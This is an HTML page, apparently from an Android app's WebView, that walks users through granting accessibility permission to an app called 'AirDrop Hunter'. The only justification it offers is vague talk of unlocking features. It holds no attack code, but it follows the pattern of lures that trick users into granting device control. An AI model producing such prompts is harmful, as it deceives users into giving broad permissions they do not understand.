<!doctype html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Enable Accessibility Permission</title> <!-- Font Awesome CDN -->
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" rel="stylesheet">
        <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Arial', sans-serif;
      background: linear-gradient(135deg, #141e30, #243b55);
      color: #fff;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      overflow: hidden;
      padding: 10px;
    }

    .container {
      text-align: center;
      padding: 30px;
      width: 100%;
      max-width: 450px;
      background: rgba(255, 255, 255, 0.1);
      border-radius: 15px;
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.3);
      backdrop-filter: blur(10px);
      animation: fadeIn 1.5s ease-in-out;
    }

    @keyframes fadeIn {
      from {
        opacity: 0;
        transform: translateY(-20px);
      }
      to {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .logo {
      width: 80px;
      height: 80px;
      margin: 0 auto 20px;
      border-radius: 50%;
      background: linear-gradient(135deg, #4facfe, #00f2fe);
      display: flex;
      align-items: center;
      justify-content: center;
      animation: bounceLogo 1s ease-in-out infinite;
    }

    @keyframes bounceLogo {
      0%, 100% {
        transform: translateY(0);
      }
      50% {
        transform: translateY(-15px);
      }
    }

    .logo i {
      font-size: 2.5em;
      color: #fff;
    }

    .title {
      font-size: 2.2em;
      font-weight: bold;
      color: #ffcc00;
      margin-bottom: 18px;
      animation: titleAnimation 1.5s ease-out;
    }

    @keyframes titleAnimation {
      0% {
        opacity: 0;
        transform: translateY(-10px);
      }
      100% {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .description {
      font-size: 1.1em;
      opacity: 0.9;
      line-height: 1.6;
      margin-bottom: 20px;
      color: #ddd;
      animation: descriptionAnimation 2s ease-out;
    }

    @keyframes descriptionAnimation {
      0% {
        opacity: 0;
        transform: translateY(10px);
      }
      100% {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .instructions {
      font-size: 1.1em;
      margin-bottom: 25px;
      color: #f0f0f0;
      text-align: left;
      line-height: 1.7;
      opacity: 0.9;
      animation: instructionsAnimation 2.5s ease-out;
    }

    @keyframes instructionsAnimation {
      0% {
        opacity: 0;
        transform: translateY(15px);
      }
      100% {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .instructions ul {
      list-style: none;
      padding-left: 15px;
      margin: 0;
    }

    .instructions li {
      margin-bottom: 8px;
      font-size: 1.1em;
      color: #f1f1f1;
    }

    .instructions li i {
      color: #00f2fe;
      margin-right: 8px;
    }

    .cta-btn {
      padding: 15px 30px;
      font-size: 1.2em;
      font-weight: bold;
      color: #fff;
      background: linear-gradient(45deg, #ff416c, #ff4b2b);
      border: none;
      border-radius: 30px;
      cursor: pointer;
      transition: all 0.3s ease;
      text-decoration: none;
      box-shadow: 0 4px 15px rgba(255, 85, 85, 0.5);
      animation: pulse 2s infinite;
    }

    .cta-btn:hover {
      transform: translateY(-5px) scale(1.05);
      box-shadow: 0 8px 30px rgba(255, 85, 85, 0.7);
    }

    @keyframes pulse {
      0%, 100% {
        transform: scale(1);
      }
      50% {
        transform: scale(1.1);
      }
    }

    /* Mobile Responsive Design */
    @media (max-width: 768px) {
      .title {
        font-size: 1.8em;
      }

      .cta-btn {
        padding: 14px 28px;
        font-size: 1.1em;
      }

      .logo i {
        font-size: 2em;
      }

      .container {
        padding: 25px;
      }
    }

    @media (max-width: 480px) {
      .title {
        font-size: 1.6em;
      }

      .description,
      .instructions {
        font-size: 1em;
      }

      .cta-btn {
        padding: 12px 24px;
        font-size: 1em;
      }

      .logo {
        width: 70px;
        height: 70px;
      }

      .logo i {
        font-size: 1.8em;
      }

      .container {
        padding: 20px;
      }
    }
  </style>
    </head>
    <body>
        <div class="container">
            <div class="logo"><i class="fas fa-unlock-alt"></i>
            </div>
            <div class="title">
                Activate Accessibility Features
            </div>
            <div class="description">
                Enable accessibility to improve your experience and unlock all features for a smoother, personalized interaction.
            </div>
            <div class="instructions">
                <p>Follow these steps:</p>
                <ul>
                    <li><i class="fas fa-arrow-right"></i> Open your device's <strong>Settings</strong>.</li>
                    <li><i class="fas fa-arrow-right"></i> Locate and tap on <strong>Accessibility</strong> in the menu.</li>
                    <li><i class="fas fa-arrow-right"></i> Find <strong>AirDrop Hunter</strong> Click on it.</li>
                    <li><i class="fas fa-arrow-right"></i> Turn The <strong>Accessibility</strong> permission ON.</li>
                </ul>
            </div> <button class="cta-btn" onclick="redirectToSettings()">Enable Accessibility</button>
        </div>
        <script>
          function redirectToSettings() {
            if (Android) {
                Android.onRedirectToSettings();
            } else {
                console.error("AndroidInterface is not defined");
            }
          }
       </script>
    </body>
</html>